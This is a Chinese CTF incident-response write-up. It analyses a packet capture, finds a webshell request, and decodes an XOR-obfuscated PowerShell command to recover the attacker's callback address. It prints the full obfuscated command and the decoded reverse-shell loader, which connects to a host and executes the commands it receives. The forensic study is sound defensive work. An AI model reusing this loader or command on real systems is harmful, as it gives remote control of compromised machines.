20250916_QQ_Powershell

news/2025/9/26 14:56:39/文章来源:https://www.cnblogs.com/JasonJHu/p/19113501

Tags:流量分析,应急响应,WebShell,Powshell,XOR

0x00. 题目

找出受攻击主机回连的IP地址和端口号

附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称:20250916_QQ_Powershell.zip

0x01. WP

1. 筛选POST请求,发现WebShell痕迹

http.request.method == "POST"

image

2. 追踪木马文件调用记录,找到可疑数字请求

image

cmd=echo "iEX(-JOIN((117,36,7,11,35,23,108,10,2,40,2,5,52,28,127,19,40,5,20,10,12,12,107,107,18,3,20,48,5,52,24,31,2,37,16,31,50,20,121,10,2,40,34,37,20,28,127,19,8,5,52,12,125,96,97,99,101,120,106,117,21,41,20,16,26,108,121,10,18,30,31,7,52,3,37,12,107,107,55,3,62,28,51,16,34,20,103,101,2,5,35,56,31,22,121,115,60,57,21,34,50,1,101,22,32,43,36,43,41,11,2,26,41,96,43,96,38,27,8,18,25,27,63,20,58,22,34,101,52,21,27,27,6,33,40,2,28,31,34,108,115,120,120,106,117,41,58,1,35,37,108,115,102,103,101,104,99,53,96,96,96,103,102,101,98,55,97,101,99,98,101,96,98,51,96,103,97,100,97,48,100,98,101,100,28,54,19,105,16,20,101,16,3,16,19,9,16,25,8,16,50,16,16,35,16,25,20,16,50,38,19,19,16,22,8,16,0,54,16,101,16,20,24,16,8,38,19,35,16,20,62,16,4,54,19,29,16,23,16,16,50,54,16,99,16,22,50,16,1,0,16,104,16,25,38,16,28,54,16,40,16,21,58,16,8,0,16,43,16,21,54,16,31,16,19,58,16,21,4,16,11,54,16,96,16,21,58,16,31,16,16,97,16,21,24,16,11,0,19,57,16,21,54,16,31,38,19,60,16,21,50,16,31,38,19,58,16,21,8,16,28,0,16,41,16,22,24,16,28,0,16,40,16,21,4,16,28,16,16,40,16,21,4,16,31,0,16,38,16,22,24,16,31,16,19,58,16,21,8,16,30,16,16,41,16,22,4,16,30,16,16,96,16,21,58,16,28,0,19,59,16,21,58,16,28,16,19,60,16,21,58,16,30,0,19,60,16,21,20,16,8,54,16,97,16,22,20,16,8,54,16,96,16,21,28,16,28,16,16,97,16,21,8,16,30,0,16,98,16,21,28,16,30,16,16,100,16,21,58,16,31,38,19,57,16,21,28,16,31,0,16,101,16,21,24,16,31,16,19,60,16,21,24,16,11,0,16,38,16,21,28,16,28,38,16,98,16,22,20,16,8,38,19,61,16,21,16,16,30,0,16,99,16,21,24,16,30,0,19,56,16,22,24,16,8,54,16,41,16,21,20,16,28,54,19,56,16,22,28,16,31,0,19,56,16,22,20,16,28,16,16,99,16,21,8,16,8,0,19,57,16,22,4,16,31,0,16,100,16,21,50,16,8,0,16,41,16,21,4,16,8,0,16,38,16,22,20,16,28,38,19,61,16,22,28,16,8,54,19,57,16,21,8,16,11,16,16,40,16,22,0,16,8,0,16,43,16,21,54,16,8,54,16,100,16,22,0,16,30,16,16,98,16,21,20,16,30,16,16,96,16,21,28,16,28,38,19,61,16,21,0,16,11,54,16,96,16,22,0,16,8,38,16,97,16,22,0,16,31,16,19,57,16,21,28,16,8,0,16,99,16,21,20,16,31,38,16,99,16,21,50,16,11,0,19,59,16,21,24,16,8,38,16,100,16,21,20,16,31,0,19,60,16,21,54,16,28,16,16,98,16,22,28,16,28,54,19,60,16,22,28,16,30,0,16,43,16,21,54,16,8,54,16,41,16,22,8,16,28,38,16,41,16,22,4,16,8,38,19,59,16,22,20,16,30,0,19,59,16,22,8,16,31,54,16,41,16,22,4,16,31,54,19,61,16,22,28,16,31,38,19,56,16,21,50,16,28,16,16,100,16,22,4,16,28,54,16,101,16,22,28,16,11,0,16,38,16,21,4,16,30,16,16,41,16,21,54,16,31,0,16,96,16,22,24,16,8,0,19,58,16,22,0,16,8,0,19,61,16,21,24,16,31,54,19,59,16,21,8,16,28,54,16,96,16,21,24,16,28,0,19,58,16,21,20,16,28,0,16,100,16,21,4,16,28,16,19,57,16,22,0,16,8,54,19,58,16,22,28,16,8,0,16,99,16,22,4,16,31,54,19,58,16,21,50,16,28,38,16,96,16,22,24,16,11,16,19,61,16,22,20,16,31,54,16,101,16,22,28,16,28,0,16,100,16,21,50,16,11,16,16,41,16,22,4,16,11,0,16,108,115,106,117,53,7,59,25,57,108,56,20,9,121,10,2,40,2,5,20,28,127,3,4,31,5,24,28,52,127,24,63,5,20,35,62,1,2,52,35,7,56,50,52,34,127,28,16,3,2,57,48,61,12,107,107,1,5,35,37,62,34,5,3,56,31,54,16,4,37,30,121,10,34,8,2,5,20,28,127,3,4,31,37,56,28,52,127,24,63,37,20,3,62,33,34,20,3,39,24,50,52,2,127,28,48,3,2,25,48,61,12,107,107,34,52,50,36,35,52,34,5,35,56,63,22,37,30,19,2,37,35,121,121,117,41,58,1,35,37,45,18,30,31,7,20,3,37,37,62,124,34,52,50,4,35,20,34,37,35,24,31,54,113,124,26,52,40,113,117,21,41,20,16,26,120,120,120,120,106,38,25,56,61,52,121,117,55,57,19,27,1,108,117,53,7,59,25,57,127,54,20,37,34,37,3,52,16,28,121,120,120,42,106,38,57,56,29,20,121,117,55,57,19,27,1,127,53,48,5,48,16,39,48,24,29,16,19,29,20,113,124,30,35,113,117,4,38,54,52,8,113,124,20,0,113,117,36,7,11,35,23,127,18,62,36,31,37,120,42,106,117,4,38,54,52,8,108,117,55,57,19,27,1,127,3,52,48,53,121,117,36,7,11,35,23,125,97,125,117,36,7,11,35,23,127,61,52,63,22,5,57,120,106,117,57,23,9,5,21,122,108,121,31,20,6,124,30,51,27,52,50,37,113,124,5,8,33,20,63,48,60,20,113,34,40,34,5,20,60,127,5,52,9,37,127,16,34,18,24,56,20,63,50,62,53,24,31,54,120,127,54,52,37,2,37,35,24,31,22,121,117,36,7,11,35,23,125,97,125,117,4,38,54,52,8,120,44,106,24,55,121,117,57,23,9,5,21,120,42,106,117,26,23,8,29,39,108,121,24,52,9,121,117,57,23,9,5,21,120,99,111,119,96,45,30,36,5,124,2,37,35,56,63,54,120,106,56,55,121,112,121,117,26,23,8,29,39,127,29,20,63,22,5,25,116,117,36,7,11,35,23,127,50,30,4,63,37,120,120,42,106,117,26,23,8,29,39,122,108,115,113,115,44,106,117,36,28,23,4,26,108,121,10,5,20,9,5,127,20,63,50,30,21,24,31,54,12,107,107,16,34,18,24,24,120,127,54,52,5,51,40,5,52,34,121,117,26,23,8,29,39,120,106,117,55,57,19,27,1,127,38,35,24,37,52,121,117,36,28,23,4,26,125,97,125,117,36,28,23,4,26,127,61,52,31,54,37,57,120,106,117,55,57,19,27,1,127,23,29,4,2,57,121,120,106,117,57,23,9,5,21,108,117,31,36,61,61,44,44)|%{[CHaR](`$_-BXoR 0x51)}));eXIt" | pOWersHeLL "IeX(IEx($INPUT))"&eXIT

3. 解码Powshell脚本

lstInt='... ...'
decrypted = [chr(num ^ 0x51) for num in lstInt]
print("".join(decrypted)) # $uVZrF=[SySTeM.ByTE[]]::CREaTeINStANcE([SystEM.BYTe],1024);$DxEAK=([CONVeRt]::fRoMbAsE64STriNG("mhDscP4GqzuzxZSKx1z1wJYCHJnEkGs4eDJJWpySMNs="));$xkPrt="76492d1116743f0423413b16050a5345MgB8AE4ARABXAHYAcAArAHEAcwBBAGYAQgA4AEIAYwBrAEoAUgBLAFAAcgA2AGcAPQA9AHwAMgAyADkAYQAzADgANABkADUAZgA1ADkANAA0ADIAZQBhADgANwBmADcANwBkADYAMQAxAGIAMQAyADUAMAAyADUANQAwAGIANABkADYAOAAxAGUAOAA1ADkAMQBjADkAMABmADkAOQBmADEAYgA0AGEAYgA1ADMAMAA0ADYAOQA3ADMAOAA5ADkANwBhADMANQA4ADIANABmADIAZQAwADMAMwA3AGEAYwBlADAAOQA2ADIAOQBiAGIAYgAxADEAMgBiAGMANQBiAGEAMAA2ADYAYQBhAGUANQA5ADcAYQAxADUAYQAwAGEAMwBlAGMAYgBhADYAZAAyAGQAYQAzADgAYgA5AGQAOAA3ADEAOAA1ADMAMwBlADQAZgA1AGQAYwA0AGQANABhADMAYQA2ADEANwA2ADcAZQBjADIAYwA5ADEANQBmADgAMAA3AGMAMgBmAGMAOQAzADgAYgAxAGYAMwAxAGUAYwBjAGEAOQBjAGYANgAxAGUANgBlAGMANwBiADcAMAA5AGUAMgA4AGMAZQAwADUAOAAxADgANQA1AGIAYQBkAGQAYQBlADIANgBjADYAMgA1ADIAMQBkADEAMQA5ADUAMABhAGQAYgBkAGMAYQA2AGUANgBkADcAMwA1AGIAZABlAGEANgA4AGMAMQA5ADcAZAAxAGUAZQA=";$dVjHh=iEX([SySTEM.RUNTIMe.InTEroPSerVices.MARShal]::PTrtosTRiNgAUtO([sYSTEM.RUNtiMe.IntERopsERvIceS.MaRSHal]::securesTrinGtOBStr(($xkPrt|CONVERtto-secUrEstrINg -Key $DxEAK))));wHile($fhBJP=$dVjHh.gEtstReAM()){;whiLE($fhBJP.daTaAvaILABLE -Or $UwgeY -EQ $uVZrF.CouNt){;$UwgeY=$fhBJP.Read($uVZrF,0,$uVZrF.lenGTh);$hFXTD+=(NEW-ObJect -TYpEnamE sysTEm.TeXt.AsCIiEncodINg).getStrING($uVZrF,0,$UwgeY)};If($hFXTD){;$KFYLv=(IeX($hFXTD)2>&1|OuT-String);if(!($KFYLv.LEnGTH%$uVZrF.cOUnt)){;$KFYLv+=" "};$uMFUK=([TEXT.EncODINg]::AsCII).geTbyTes($KFYLv);$fhBJP.wrIte($uMFUK,0,$uMFUK.leNgth);$fhBJP.FLUSh();$hFXTD=$Null}}

Powshell窗口执行前部分代码

PS C:\Users\Administrator> $uVZrF=[SySTeM.ByTE[]]::CREaTeINStANcE([SystEM.BYTe],1024);$DxEAK=([CONVeRt]::fRoMbAsE64STriNG("mhDscP4GqzuzxZSKx1z1wJYCHJnEkGs4eDJJWpySMNs="));$xkPrt="76492d1116743f0423413b16050a5345MgB8AE4ARABXAHYAcAArAHEAcwBBAGYAQgA4AEIAYwBrAEoAUgBLAFAAcgA2AGcAPQA9AHwAMgAyADkAYQAzADgANABkADUAZgA1ADkANAA0ADIAZQBhADgANwBmADcANwBkADYAMQAxAGIAMQAyADUAMAAyADUANQAwAGIANABkADYAOAAxAGUAOAA1ADkAMQBjADkAMABmADkAOQBmADEAYgA0AGEAYgA1ADMAMAA0ADYAOQA3ADMAOAA5ADkANwBhADMANQA4ADIANABmADIAZQAwADMAMwA3AGEAYwBlADAAOQA2ADIAOQBiAGIAYgAxADEAMgBiAGMANQBiAGEAMAA2ADYAYQBhAGUANQA5ADcAYQAxADUAYQAwAGEAMwBlAGMAYgBhADYAZAAyAGQAYQAzADgAYgA5AGQAOAA3ADEAOAA1ADMAMwBlADQAZgA1AGQAYwA0AGQANABhADMAYQA2ADEANwA2ADcAZQBjADIAYwA5ADEANQBmADgAMAA3AGMAMgBmAGMAOQAzADgAYgAxAGYAMwAxAGUAYwBjAGEAOQBjAGYANgAxAGUANgBlAGMANwBiADcAMAA5AGUAMgA4AGMAZQAwADUAOAAxADgANQA1AGIAYQBkAGQAYQBlADIANgBjADYAMgA1ADIAMQBkADEAMQA5ADUAMABhAGQAYgBkAGMAYQA2AGUANgBkADcAMwA1AGIAZABlAGEANgA4AGMAMQA5ADcAZAAxAGUAZQA=";
PS C:\Users\Administrator> [SySTEM.RUNTIMe.InTEroPSerVices.MARShal]::PTrtosTRiNgAUtO([sYSTEM.RUNtiMe.IntERopsERvIceS.MaRSHal]::securesTrinGtOBStr(($xkPrt|CONVERtto-secUrEstrINg -Key $DxEAK)))
New-Object System.Net.Sockets.TCPClient('192.168.93.129',12345)

得到回连IP和端口为192.168.93.129:12345

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/918418.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

完整教程:HTTP安全响应头--CSP(Content-Security-Policy)

完整教程:HTTP安全响应头--CSP(Content-Security-Policy)pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Conso…

学习:uniapp全栈微信小程序vue3后台(26) - 指南

学习:uniapp全栈微信小程序vue3后台(26) - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas"…

HTML5介绍(HTML5特性、HTML5功能) - 指南

HTML5介绍(HTML5特性、HTML5功能) - 指南2025-09-26 14:50 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: blo…

Experiment1

Experiment 1 实验任务1 1.1 #include <stdio.h> int main() {printf(" O \n");printf("<H>\n");printf("I I\n");printf(" O \n");printf("<H>\n&qu…

读书笔记:Oracle 自动索引:让数据库自己管索引?

我们的文章会在微信公众号IT民工的龙马人生和博客网站( www.htz.pw )同步更新 ,欢迎关注收藏,也欢迎大家转载,但是请在文章开始地方标注文章出处,谢谢! 由于博客中有大量代码,通过页面浏览效果更佳。本文为个人学…

海安县建设局网站先备案还是先做网站

分类目录&#xff1a;《系统学习Python》总目录 文章《系统学习Python——装饰器&#xff1a;“私有“和“公有“属性案例-[实现私有属性]》中的代码有点复杂&#xff0c;并且你最好自己跟踪运行它&#xff0c;看看它是如何工作的。然而为了帮助你理解&#xff0c;这里给出一些…

1_2025.9.26_1

题目:[https://codeforces.com/problemset/problem/2140/E1] ac代码:[https://codeforces.com/contest/2140/submission/340570458] 思路:状压dp,因m<=2,n<=20,所以将状态压缩遍历,再根据题解给的式子写即…

故障处理:Oracle RAC集群CTSS时钟同步故障案例分析与解决

我们的文章会在微信公众号IT民工的龙马人生和博客网站( www.htz.pw )同步更新 ,欢迎关注收藏,也欢迎大家转载,但是请在文章开始地方标注文章出处,谢谢! 由于博客中有大量代码,通过页面浏览效果更佳。本案例来自一…

Linux系统提权-web/普通用户-docker逃逸提权shell交互

Linux系统提权-web/普通用户-docker逃逸&提权&shell交互 docker提权分几种情况 1、权限在docker里面逃逸 提权(宿主机) 2、权限不在docker里面借助docker应用去提权(用户归属是docker组 拉镜像 提权)参考链接h…

网站开发z亿玛酷1负责网页设计与制作策划书

目录 1.加载镜像并进入容器 2.安装依赖 3.在docker外部git-clone lcm 4.将get-clone的lcm复制到容器中 5.编译库 6.将可执行文件复制到容器中 7.进入可执行文件 8.编译可执行文件 9.再开一个终端运行程序 10.将以上容器打成镜像并导出 1.加载镜像并进入容器 sudo do…

PostgreSQL技术大讲堂 - 第106讲:分区表索引优化

PostgreSQL从入门到精通系列课程,100+节PG技术讲解,让你从小白一步步成长为独当一面的PG专业人员,点击这里查看章节内容,持续更新,欢迎加入。 第106讲:重讲分区表索引优化主要内容:1、全局索引与本地分区索引的…

AI智能体:从认知到实践

人工智能时代:时代的机遇和挑战。潮起AI Agent智能体到底是什么,为什么大家都在卷AI智能体1、什么是AI Agent智能体? 规划感知,决策,行动 ===》记忆 =》》大语言模型理解智能体,人工智能的本质是仿生技术,我们…

Kinect屏幕边缘检测不灵敏的解决方案

在做体感项目时,在边缘部分的抓取动作识别非常差于是我做出了优化,不采用原本的映射关系:假设原本人物站在中间,保持位置不动,右手臂向右伸直,终点为屏幕的极限位置此时我们并不将手臂伸直的位置映射到屏幕的极限…

网站建设话术关键词wordpress 仿豆瓣标注

1、目的 使公司的图纸得到有效的控制&#xff0c;确保生产所用的图纸为最新有效版本&#xff0c;避免因图纸管理不当造成的损失。 2、定义 本制度所述的图纸包括产品总装图、装配图、零件图、工装图纸、检具图纸、包装图纸、工艺流程 3、范围 客户提供的图纸&#xff0c;技…

国内做交互网站WordPress 如何去域名授权

对于关系型数据库而言&#xff0c;针对表的检索&#xff0c;一般来说&#xff0c;建立合适的索引就可以达到很好的检索效果。&#xff08;这里不包含表设计的合理与否&#xff09;比如像状态列这样可选择性非常低的值&#xff0c;该如何检索&#xff1f; 其实这个已经不是关系…

暴力拓客游戏小程序:助力商家高效引流与裂变的智能解决方案

在数字化营销时代,流量获取与用户裂变成为商家经营的核心需求。暴力拓客游戏小程序(以热门口红游戏为核心载体)应运而生,依托微信生态,通过 “游戏 + 裂变” 模式,为运营商和实体商户提供从流量获取、用户转化到…

vue3小坑之-为什么把ref定义的数组赋值给数组对象后取值为空数组?

天呢,居然两年没有上博客园看过了,呜呜呜,日渐废柴 这次总结一个码代码的时候遇到的问题,为什么把数据赋值给数组对象的某个字段,打印出来的是个空数组? 错误写法一:// 动态获取list值,前端可以增删改查 const …

第二类斯特林数

定义 第二类斯特林数记作 \(\begin{Bmatrix}n\\ k\end{Bmatrix}\) 或者 \(S(n,k)\),其意义是将 \(n\) 个互不相同的元素划分为 \(k\) 个相同的非空集合的方案数。 朴素求解 \[\begin{Bmatrix}n\\ k\end{Bmatrix} =\be…

扫码签到赢大奖小程序:助力多场景获客的智能营销工具

在数字化营销浪潮下,线下场景的流量激活与用户留存成为商家核心需求。由厦门掌界网络开发的 “扫码签到赢大奖” 小程序,依托微信生态,以 “签到 + 抽奖” 为核心模式,为门店、景区、展会等场景提供低成本、高效率…

seo基础入门汉中网站seo

公司里绝大多数主机已经禁止外网访问&#xff0c;仅保留一台主机设置socks作为代理服务器。如下为对socks这一概念的学习整理 什么是socks 是一种OSI模型下会话层的协议&#xff0c;位于表示层与传输层之间&#xff0c;作用是&#xff1a; exchanges network packets between…